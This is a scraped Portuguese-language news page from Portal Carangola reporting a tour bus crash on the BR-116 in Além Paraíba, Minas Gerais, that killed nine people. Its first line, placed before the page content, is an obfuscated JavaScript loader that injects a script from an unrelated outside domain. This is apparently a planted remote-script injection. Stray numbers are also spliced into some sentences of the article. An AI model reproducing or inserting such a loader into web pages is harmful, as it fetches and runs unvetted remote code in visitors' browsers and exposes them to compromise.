;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Chega a nove número de mortos em acidente de ônibus em MG - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Chega a nove número de mortos em acidente de ônibus em MG

30Veículo caiu em ribanceira de 80 metros e ficou submerso em córrego.
Equipes de resgate ainda procuram três pessoas desaparecidas.
Chega a nove o número de mortos no acidente envolvendo um ônibus de turismo no quilômetro 790 da BR-116, em Além Paraíba (MG), segundo informações da Polícia Rodoviária Federal. Equipes de resgate fazem buscas por três pessoas que estariam desaparecidas.
De acordo com a PRF, o ônibus foi removido do córrego onde havia caído para que os bombeiros pudessem procurar as vítimas. O veículo estava parcialmente submerso e foi suspenso por guinchos.

Equipes trabalham para retirar o ônibus do fundo da ribanceira. O veículo será levado para Leopoldina (MG), onde será submetido à perícia da Polícia Civil.

No total, 22 pessoas foram resgatadas com vida e levadas para unidades de saúde de Além Paraíba e de Leopoldina (MG).

A assessoria de imprensa da Viação Itapemirim informou, na tarde desta terça-feira (30), que havia 33 passageiros no ônibus mais o motorista. De acordo com a empresa, quatro crianças estavam no 58veículo. Pela manhã, a Itapemirim chegou a informar que o veículo transportava 31 passageiros.

Segundo a PRF, o ônibus caiu de um barranco de 80 metros de altura, em uma curva, e ficou parcialmente submerso em um córrego. O acidente com o veículo, que partiu de Iúna, no Espírito Santo, e seguia para São Paulo, ocorreu às 23h30 de segunda-feira (29).

Ofertas:rodaspneuscalotas

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.